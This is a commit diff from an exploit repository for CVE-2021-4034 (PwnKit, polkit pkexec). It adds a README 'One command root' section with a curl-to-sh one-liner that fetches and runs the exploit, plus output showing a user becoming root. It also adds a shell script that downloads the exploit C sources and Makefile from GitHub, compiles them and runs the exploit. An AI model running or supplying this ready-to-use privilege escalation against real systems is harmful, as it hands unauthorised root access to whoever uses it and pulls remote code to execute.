One-liner root
This commit is contained in:
parent
54b79d1cd1
commit
465b0f35b2
18
README.md
18
README.md
@ -36,3 +36,21 @@ vagrant@ubuntu-impish:~/CVE-2021-4034$
|
|||||||
## About Polkit pkexec for Linux
|
## About Polkit pkexec for Linux
|
||||||
|
|
||||||
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
|
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
|
||||||
|
|
||||||
|
|
||||||
|
# One command root
|
||||||
|
`curl -s https://raw.githubusercontent.com/Nickguitar/CVE-2021-4034/main/cve-2021-4034.sh | sh`
|
||||||
|
|
||||||
|
```
|
||||||
|
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
|
||||||
|
vagrant
|
||||||
|
vagrant@ubuntu-impish:~/CVE-2021-4034$ curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh | sh
|
||||||
|
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
|
||||||
|
cc -Wall cve-2021-4034.c -o cve-2021-4034
|
||||||
|
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
|
||||||
|
mkdir -p GCONV_PATH=.
|
||||||
|
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
|
||||||
|
# whoami
|
||||||
|
root
|
||||||
|
|
||||||
|
```
|
||||||
|
16
cve-2021-4034.sh
Normal file
16
cve-2021-4034.sh
Normal file
@ -0,0 +1,16 @@
|
|||||||
|
#!/usr/bin/env sh
|
||||||
|
|
||||||
|
set -e
|
||||||
|
|
||||||
|
URL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/'
|
||||||
|
|
||||||
|
for EXPLOIT in "${URL}/cve-2021-4034.c" \
|
||||||
|
"${URL}/pwnkit.c" \
|
||||||
|
"${URL}/Makefile"
|
||||||
|
do
|
||||||
|
curl -sLO "$EXPLOIT" || wget --no-hsts -q "$EXPLOIT" -O "${EXPLOIT##*/}"
|
||||||
|
done
|
||||||
|
|
||||||
|
make
|
||||||
|
|
||||||
|
./cve-2021-4034
|
Loading…
Reference in New Issue
Block a user